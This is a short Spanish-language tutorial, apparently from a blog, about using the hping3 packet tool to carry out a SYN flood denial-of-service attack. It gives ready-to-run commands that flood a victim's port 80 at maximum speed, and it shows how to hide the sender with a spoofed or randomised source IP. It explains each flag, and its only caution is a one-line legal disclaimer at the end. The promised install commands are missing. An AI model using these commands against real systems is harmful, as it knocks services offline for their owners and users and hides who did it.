HPing es una herramienta en linea de comandos que nos permite crear y analizar paquetes TCP/IP,
y como tal tiene un muchas utilidades: hacer testing de firewalls,
escaneo de puertos, redes y como no… también tiene la capacidad
de provocar un SYN Flood Attack (DD0S).
El objetivo de un ataque de este tipo es
el envío de peticiones de conexión TCP más rápido de lo que una
máquina puede procesar, al fin de saturar los recursos y evitar que la
máquina pueda aceptar más conexiones.
Para instalar la ultima versión de hping dependiendo de la distribucion que usemos haríamos:- En Debian y derivadas como Ubuntu y Linux Mint.
- En Fedora
- En OpenSUSE
Un ataque clásico de DDoS sería el siguiente
hping3 -p 80 -S
--
flood ip_victima
donde :
-p 80 es el puerto que elegimos atacar
-S activa el flag Syn
--
flood le indica a hping que envie los paquetes a la máxima velocidad posibleip_victima es la ip o dominio a atacar
Si queremos que nuestra ip no sea visible podemos añadirle la opción -a y la ip que vamos a falsear
hping3 -a ip_falsa -p 80 -S
--
flood ip_victima
o bien utilizar
--
rand-source con lo que se generan direcciones de origen ip al azar
Como veis en los ejemplos el testing lo he realizado sobre mi propia red…así que recordaros como es obvio, que los ataques DDoS son considerados delito en muchos países…por lo que please ser responsables con el uso que le deis.